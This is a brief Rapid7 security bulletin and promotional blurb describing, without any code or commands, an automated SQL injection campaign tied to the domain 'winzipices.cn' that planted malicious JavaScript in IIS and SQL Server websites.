Rapid7 -Automated SQL Injection Attacks 1 million Servers

Web sites hit by an automated SQL injection attack have their web page contents modified to point to malware that is automatically downloaded by any visitor to the site.  These sites are all vulnerable to SQL injection (or have recently been vulnerable) and were hacked by this automated hacker toolkit. In addition, by executing a Google search on the malware server name, hackers can find sites that have already been exploited.  

The "winzipices.cn" SQL injection attack is aimed at web applications based on Microsoft's IIS web server and SQL Server and has hit over 500,000 websites, including the United Nations, UK Government sites and the U.S. Department of Homeland Security.  The automated attack takes advantage of the fact that Microsoft's SQL Server allows generic commands that don't require specific table-level arguments. The vulnerability is the result of poor data handling by the sites' creators, rather than a specific Microsoft flaw.  The attack injects malicious JavaScript code into every text field in the database. The Javascript then displays in the site's pages and loads an external script that can compromise a user's PC.

Click here to find out how to stop SQL Injections Today.

About Rapid7:

Rapid7 is the leading provider of Unified Vulnerability Management (UVM) Solutions.  Rapid7 NeXpose UVM provides network, database and web application vulnerability management for enterprises deployments and small to medium businesses.  Since introduced, NeXpose has been sold to corporate enterprises, Global 2000 companies, and government entities, and serves the full range of vertical markets across the U.S. and abroad. In addition, Rapid7 provides compliance products and services for PCI, HIPAA and Sarbanes Oxley.  

Click here for more information about Rapid7.